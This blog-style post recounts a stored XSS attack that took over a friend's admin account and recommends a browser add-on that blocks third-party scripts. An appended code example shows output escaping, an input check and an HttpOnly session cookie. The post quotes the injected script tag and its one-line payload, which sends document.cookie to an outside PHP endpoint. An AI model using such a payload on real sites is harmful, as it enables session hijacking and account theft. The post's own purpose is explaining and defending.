A small hack story

One of my friends came to me and told me he lost his admin user while he was browsing the web site. I was surprised, because normally that does not happen if the site is using ASP.NET :) It's sad but true: ASP.NET does not allow HTML inclusion in POST data. Anyway, the hacker put script code into his name field like this:

<script src="http://inso.host.sk/sniffer/c.js"></script>

It's not a big deal. If you look at the output of this script, you will see this:

a=new/**/Image();a.src='http://inso.host.sk/sniffer/s.php?a='+escape(document.cookie);

In the end it steals the browser's cookie and sends it to a PHP file, while the hacker browses another URL to see which fish fell for the trick :) Anyway, today I did some research and found a solution to this situation:

https://addons.mozilla.org/en-US/firefox/addon/722

You should simply disable all JS inclusions in the page except those from the page's own domain. That will make your browser more secure.
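The site-side counterpart to the browser fix, as an added example that is not part of the original post: the name field rendered raw next to the encoded form, a simplified input check in the spirit of the ASP.NET behaviour mentioned above, and a session cookie that `document.cookie` cannot read. All function names, the `sid` cookie name and the sample name value are assumptions made for illustration.

```javascript
// Added example, not code from the original post. All names are hypothetical.

// Encode the characters that let text break out of HTML content or attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the stored name is pasted into the page as markup,
// so a <script> tag saved in the name field runs for every viewer.
function renderNameUnsafe(name) {
  return '<td class="name">' + name + '</td>';
}

// Hardened: the stored name is encoded at output time and shown as plain text.
function renderNameSafe(name) {
  return '<td class="name">' + escapeHtml(name) + '</td>';
}

// Simplified input check (assumption: flag "<" followed by a letter,
// "!", "/" or "?", and "&#"). A second layer, not a replacement for encoding.
function looksLikeMarkup(value) {
  return /<[a-z!\/?]|&#/i.test(String(value));
}

// HttpOnly keeps the session cookie out of document.cookie, so an injected
// script has no session value to append to its image URL.
function sessionCookieHeader(sessionId) {
  return 'Set-Cookie: sid=' + encodeURIComponent(sessionId) +
    '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed sample input, shaped like the name field described in the post.
const storedName = 'bob<script src="http://inso.host.sk/sniffer/c.js"></script>';

console.log(renderNameUnsafe(storedName)); // tag reaches the page intact
console.log(renderNameSafe(storedName));   // tag is displayed as text
console.log(looksLikeMarkup(storedName), looksLikeMarkup("O'Brien"));
console.log(sessionCookieHeader('constructed-session-id'));
```
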
